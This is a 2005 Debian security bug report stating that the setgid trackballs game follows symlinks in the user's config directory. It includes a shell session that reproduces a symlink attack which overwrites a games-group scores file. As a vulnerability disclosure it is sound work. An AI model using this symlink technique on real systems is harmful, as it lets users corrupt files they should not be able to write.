Subject: trackballs: Follows symlinks as gid games
Package: trackballs
Version: 1.0.0-9
Severity: important
Tags: security
Hello,
I have found that trackballs follows symlinks when running as gid games. It
writes
to files such as $HOME/.trackballs/[USERNAME].gmr and $HOME/.trackballs/settings
without checking if they are symlinks somewhere else. This can be abused for
overwriting or creating files wherever the games group is allowed to do so.
One way to solve the problem is to make sure that these files are not symlinks.
Here is a session capture showing this problem:
$ dpkg -l trackballs
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
||/ Name Version
Description
+++-=================================-=================================-==================================================================================
ii trackballs 1.0.0-9 An
OpenGL-based game of marbles through a labyrinth
$ rm -rf ~/.trackballs
$ mkdir ~/.trackballs
$ ln -s /var/games/gnometris.scores ~/.trackballs/metaur.gmr
$ ln -s /tmp/testing ~/.trackballs/settings
$ ls -al /tmp/testing
ls: /tmp/testing: No such file or directory
$ cat /var/games/gnometris.scores
31.000000 1105059399 Ulf Harnhammar
$ ls -al ~/.trackballs/
total 12
drwxr-xr-x 2 metaur metaur 4096 2005-03-31 23:22 .
drwxr-xr-x 68 metaur metaur 8192 2005-03-31 23:22 ..
lrwxrwxrwx 1 metaur metaur 27 2005-03-31 23:22 metaur.gmr ->
/var/games/gnometris.scores
lrwxrwxrwx 1 metaur metaur 12 2005-03-31 23:22 settings -> /tmp/testing
$ trackballs -w
Welcome to Trackballs.
Using /usr/share/games/trackballs as gamedata dir
Warning: Rescaling images before loading them as textures.
Attempting to open mixer...open /dev/sequencer: No such file or directory
successfull
Warning. Ignoring outdated player profile for player metaur
Warning. Ignoring outdated player profile for player metaur
Trackballs initialization successfull
Killed
$ cat /var/games/gnometris.scores
^_M-^K^H^CM-eM-^U1^NM-B0^LE^C^KM-WM-p^Uz^CJ^E^ClM-$^R#
4M-$M-^A4M-)M-^R^T^DM-''U+1M-1M-DM-#-yM-5M-,M-wM-dM-o%M-{_M-+M-T%^Xg^UM-<M-D^[ZM-WIFM--^VM-)[EMAIL
PROTECTED]@[EMAIL
PROTECTED]){M-DM-^LM-+M-3(^I<za^UEM-z?^GEM-^H0sM-p93^ZM-^\^BM-65:M-R509M-(DM-^H^F^AAM-^N^L^Q^ZM-F,M-ZM-9M-A^CM-^W"8^[HM-~^CmcM-^^ELuKM-|f|M-g^\^UM-{M-!M-k^YM-q;M-XxM-]`M-bM-xM-^^^XbM-RM-hM-
[EMAIL PROTECTED]<
$ ls -al /tmp/testing
-rw-r--r-- 1 metaur games 80 2005-03-31 23:23 /tmp/testing
$ cat /tmp/testing
[EMAIL PROTECTED]@M-^?M-^?M-^?^?$
$
// Ulf H�rnhammar for the Debian Security Audit Project
http://www.debian.org/security/audit/
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Versions of packages trackballs depends on:
ii guile-1.6-lib 1.6.7-1 Main Guile libraries
ii libc6 2.3.2.ds1-20 GNU C Library: Shared libraries an
ii libgcc1 1:3.4.3-6 GCC support library
ii libguile-ltdl 1.6.7-1 Guile's patched version of libtool
ii libqthreads-1 1.6.7-1 QuickThreads library for Guile
ii libsdl-image1 1.2.4-1 image loading library for Simple D
ii libsdl-mixer1 1.2.6-1 mixer library for Simple DirectMed
ii libsdl-ttf2.0 2.0.6-5 ttf library for Simple DirectMedia
ii libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer
ii libstdc++5 1:3.3.5-8 The GNU Standard C++ Library v3
ii trackballs-da 1.0.0-7 Data files for trackballs
ii xlibmesa-gl [ 4.3.0.dfsg.1-10 Mesa 3D graphics library [XFree86]
ii xlibmesa-glu 4.3.0.dfsg.1-10 Mesa OpenGL utility library [XFree
ii zlib1g 1:1.2.2-3 compression library - runtime
-- no debconf information
